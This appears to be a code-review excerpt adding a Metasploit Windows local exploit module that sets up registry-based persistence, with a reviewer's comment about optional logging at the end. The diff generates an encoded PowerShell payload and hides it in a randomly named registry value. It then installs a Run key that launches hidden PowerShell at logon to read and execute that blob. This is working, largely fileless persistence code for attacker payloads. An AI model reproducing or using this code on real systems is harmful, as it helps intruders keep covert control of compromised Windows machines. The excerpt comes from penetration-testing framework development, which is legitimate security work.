modules/exploits/windows/local/registry_persistence.rb

```diff
@@ -0,0 +1,192 @@
+      OptString.new('RUN_NAME',
+        [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
+      OptEnum.new('TECHNIQUE', [true, 'Execution technique', 'PSH', ['PSH']]), # Just PSH for now, might add others later.
+    ], self.class)
+    end
+
+    def generate_payload_blob
+        if datastore['TECHNIQUE'] == 'PSH'
+            blob = cmd_psh_payload(payload.encoded,payload_instance.arch.first,use_single_quotes: true, encode_final_payload: true).split(' ')[-1]
+        end
+
+        return blob
+    end
+
+    def generate_cmd(root_path, blob_key_name, blob_key_reg)
+        if datastore['TECHNIQUE'] == 'PSH'
+            cmd = "%COMSPEC% /b /c start /b /min powershell -nop -c $y=(Get-Item('#{root_path}:#{blob_key_name}')).GetValue('#{blob_key_reg}'); powershell -nop -e $y" # There might be a better way to do this.
+        end
+        return cmd
+    end
+
+    def generate_blob_reg
+        blob_reg_key = datastore["BLOB_REG_KEY"] || "Software\\#{Rex::Text.rand_text_alphanumeric(8)}"
+        blob_reg_name = datastore["BLOB_REG_NAME"] || Rex::Text.rand_text_alphanumeric(8)
+        return blob_reg_key, blob_reg_name
+    end
+
+    def generate_cmd_reg
+        cmd_reg = datastore["RUN_NAME"] || Rex::Text.rand_text_alphanumeric(8)
+        return cmd_reg
+    end
+
+    def install_blob(root_path, blob, blob_reg_key, blob_reg_name)
+        blob_reg_key = "#{root_path}\\#{blob_reg_key}"
+        if not registry_enumkeys(blob_reg_key)
+            if registry_createkey(blob_reg_key)
+                print_good("Created registry key #{blob_reg_key}")
+            else
+                fail_with(Failure::Unknown,"Failed to create key #{blob_reg_key}")
+            end
+        end
+
+        if registry_setvaldata(blob_reg_key, blob_reg_name, blob, "REG_SZ")
+            print_good("Installed payload blob to #{blob_reg_key}\\#{blob_reg_name}")
+        else
+            fail_with(Failure::Unknown,'Failed to open the registry key for writing')
+        end
+
+    end
+
+    def install_cmd(cmd, cmd_reg, root_path)
+        if registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", cmd_reg, cmd, 'REG_EXPAND_SZ')
+            print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{cmd_reg}")
+        else
+            fail_with(Failure::Unknown,'Could not install run key')
+        end
+    end
+
+    def get_root_path
+        if datastore["STARTUP"] == 'USER'
+            root_path = 'HKCU'
+        else
+            root_path = 'HKLM'
+        end
+        return root_path
+    end
+
+    def log_file(log_path = nil) # Thanks Meatballs for this
+        # Get hostname
+        host = session.session_host
+
+        # Create Filename info to be appended to downloaded files
+        filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+        # Create a directory for the logs
+        if log_path
```

Comment:
Can the log stuff be optional? The module explains that it's registry-only, yet modification of the file system is happening too. Do you think it'd be better to allow this to be configurable, or is this important and has to be there regardless? If the latter, then the description should be updated.